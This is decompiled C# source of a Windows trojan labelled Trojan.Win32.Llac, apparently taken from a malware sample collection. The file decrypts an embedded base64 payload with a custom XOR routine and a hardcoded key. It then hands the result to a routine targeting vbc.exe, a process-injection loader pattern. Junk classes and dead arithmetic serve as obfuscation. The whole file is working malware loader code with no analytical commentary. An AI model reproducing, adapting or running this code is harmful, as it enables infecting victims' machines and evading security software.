MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.aujq-2899a5ffe6277f7b0edb8caed92e38de7a399fdb7bb9c5805376f2b5b6aeb2ec/lpoppkdfop.cs

// Decompiled with JetBrains decompiler
// Type: lpoppkdfop
// Assembly: PwnzTest, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 631E39F5-1CA8-4C07-9995-19D9DD762690
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.aujq-2899a5ffe6277f7b0edb8caed92e38de7a399fdb7bb9c5805376f2b5b6aeb2ec.exe

using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Text;

[StandardModule]
internal sealed class lpoppkdfop
{
  [STAThread]
  public static void Main()
  {
    int num1 = 0;
    byte[] figdfg89df8u9g = Convert.FromBase64String("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
    byte[] b = lpoppkdfop.fi9gf9fdhdfh.kf9034fvbgffdh(ref figdfg89df8u9g, Encoding.GetEncoding(1250).GetBytes("cWLhWNcmTTHuUrDRzQDGhUSMfcyTtzvGJXuvEOJnCUqIDtXiihlVOVANMehkcAPHsbdxYfsCWlXJmHGjPiSWxXjdvsOlJBxJbpKy"));
    int num2 = 34523;
    num1 = num2 != 5487 ? checked (num2 - 2382526) : checked (num2 + 3985);
    dofgdgpd9d0s.ccvxbfr54fd(b, "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe");
    if (num2 == 5487)
      num1 = checked (num2 + 3985);
    else
      num1 = checked (num2 - 2382526);
  }

  public class fi9gf9fdhdfh
  {
    public static byte[] kf9034fvbgffdh(
      ref byte[] figdfg89df8u9g,
      byte[] pksfsi90fdsdfi90d,
      uint pksfsi90fdsdfifgdhdfh90d = 0)
    {
      string str1 = "CuNIYXTfStbJfxcWgTsyZuO";
      string str2 = "hJZFauwoxaBATHogeDJGkbR";
      int num1 = checked ((int) ((long) (figdfg89df8u9g.Length - 1) * ((long) pksfsi90fdsdfifgdhdfh90d + 1L)));
      int num2 = 0;
      while (num2 <= num1)
      {
        string str3 = "wlLuuhcRjjFjxcDcKOcVIWd";
        int num3 = 7450672;
        figdfg89df8u9g[num2 % figdfg89df8u9g.Length] = checked ((byte) unchecked (checked (((int) figdfg89df8u9g[unchecked (num2 % figdfg89df8u9g.Length)] ^ (int) pksfsi90fdsdfi90d[unchecked (num2 % pksfsi90fdsdfi90d.Length)]) - (int) figdfg89df8u9g[unchecked (checked (num2 + 1) % figdfg89df8u9g.Length)] + 256) % 256));
        if (num3 == 574557)
          str1 = "nLQcVNYEUyahwovERJrctjY";
        else
          str2 = str3;
        checked { ++num2; }
      }
      Array.Resize<byte>(ref figdfg89df8u9g, checked (figdfg89df8u9g.Length - 1));
      return figdfg89df8u9g;
    }

    public static byte[] kf90gffdh(
      ref byte[] figdfg89df8u9g,
      byte[] pksfsi90fdsdfi90d,
      uint pksfsi90fdsdfifgdhdfh90d = 0)
    {
      Array.Resize<byte>(ref figdfg89df8u9g, checked (figdfg89df8u9g.Length + 1));
      figdfg89df8u9g[checked (figdfg89df8u9g.Length - 1)] = Convert.ToByte(new Random().Next(1, (int) byte.MaxValue));
      string str = "YaVgwkYxIHKarfsBaOXggJJxoT";
      int num1 = 19659637;
      int num2 = checked ((int) ((long) (figdfg89df8u9g.Length - 1) * ((long) pksfsi90fdsdfifgdhdfh90d + 1L)));
      while (num2 >= 0)
      {
        if ((double) num1 == Conversions.ToDouble("jidfgfui"))
          num1 = checked ((int) Math.Round(unchecked ((double) num1 + Conversions.ToDouble("fgjfgjifiogjij"))));
        figdfg89df8u9g[num2 % figdfg89df8u9g.Length] = (byte) ((int) checked ((byte) unchecked (checked ((int) figdfg89df8u9g[unchecked (num2 % figdfg89df8u9g.Length)] + (int) figdfg89df8u9g[unchecked (checked (num2 + 1) % figdfg89df8u9g.Length)]) % 256)) ^ (int) pksfsi90fdsdfi90d[num2 % pksfsi90fdsdfi90d.Length]);
        if (num1 == 5950545)
          num1 = 128349826;
        else
          str = "igSPnRdwgVrSyKgXrYQAbDDtTQ";
        checked { num2 += -1; }
      }
      return figdfg89df8u9g;
    }

    public class ffjg4546duihgud
    {
      private string xYh7YfTEsmhUgdsiud;
      private int uhE8dWEkAo9Ul2fxh6m7ip3oCG27o7rikvtjgdikfd;
      private int RznvYAabN2gjgijgigd;

      public ffjg4546duihgud()
      {
        this.xYh7YfTEsmhUgdsiud = "dfkodfpogjdf";
        this.uhE8dWEkAo9Ul2fxh6m7ip3oCG27o7rikvtjgdikfd = 0;
        this.RznvYAabN2gjgijgigd = 3465456;
      }

      private void dsfksgioj()
      {
        if (Conversions.ToDouble(this.xYh7YfTEsmhUgdsiud) > 0.0)
          checked { ++this.uhE8dWEkAo9Ul2fxh6m7ip3oCG27o7rikvtjgdikfd; }
        else
          checked { this.RznvYAabN2gjgijgigd += 3259285; }
      }
    }

    public class kpfdvxfgfgdfhuuixbdvbcbcfg9089df
    {
      private string duisdg4S77S15aQygVPU0elUxEGgL29hAJaY;
      private int dfkidgj69cYn1anNxow3aNC3DWq1A8pw;
      private int dgigjigjgxfFO1mDqp616aB7YDO6IZtKO8B4d6lh545ikPOlpyRK;

      public kpfdvxfgfgdfhuuixbdvbcbcfg9089df()
      {
        this.duisdg4S77S15aQygVPU0elUxEGgL29hAJaY = "dfkodfpogjdf";
        this.dfkidgj69cYn1anNxow3aNC3DWq1A8pw = 0;
        this.dgigjigjgxfFO1mDqp616aB7YDO6IZtKO8B4d6lh545ikPOlpyRK = 3465456;
      }

      private void dsfksgioj()
      {
        if (Conversions.ToDouble(this.duisdg4S77S15aQygVPU0elUxEGgL29hAJaY) > 0.0)
          checked { ++this.dfkidgj69cYn1anNxow3aNC3DWq1A8pw; }
        else
          checked { this.dgigjigjgxfFO1mDqp616aB7YDO6IZtKO8B4d6lh545ikPOlpyRK += 3259285; }
      }
    }
  }

  public class ffjg211222duihgud
  {
    private string sX1O6MNFFV52aEgdsiud;
    private int JoY3QoJCif8QbKG82iy5jgdikfd;
    private int XxLND84a1Uf7qYgjgijgigd;

    public ffjg211222duihgud()
    {
      this.sX1O6MNFFV52aEgdsiud = "dfkodfpogjdf";
      this.JoY3QoJCif8QbKG82iy5jgdikfd = 0;
      this.XxLND84a1Uf7qYgjgijgigd = 3465456;
    }

    private void dsfksgioj()
    {
      if (Conversions.ToDouble(this.sX1O6MNFFV52aEgdsiud) > 0.0)
        checked { ++this.JoY3QoJCif8QbKG82iy5jgdikfd; }
      else
        checked { this.XxLND84a1Uf7qYgjgijgigd += 3259285; }
    }
  }
}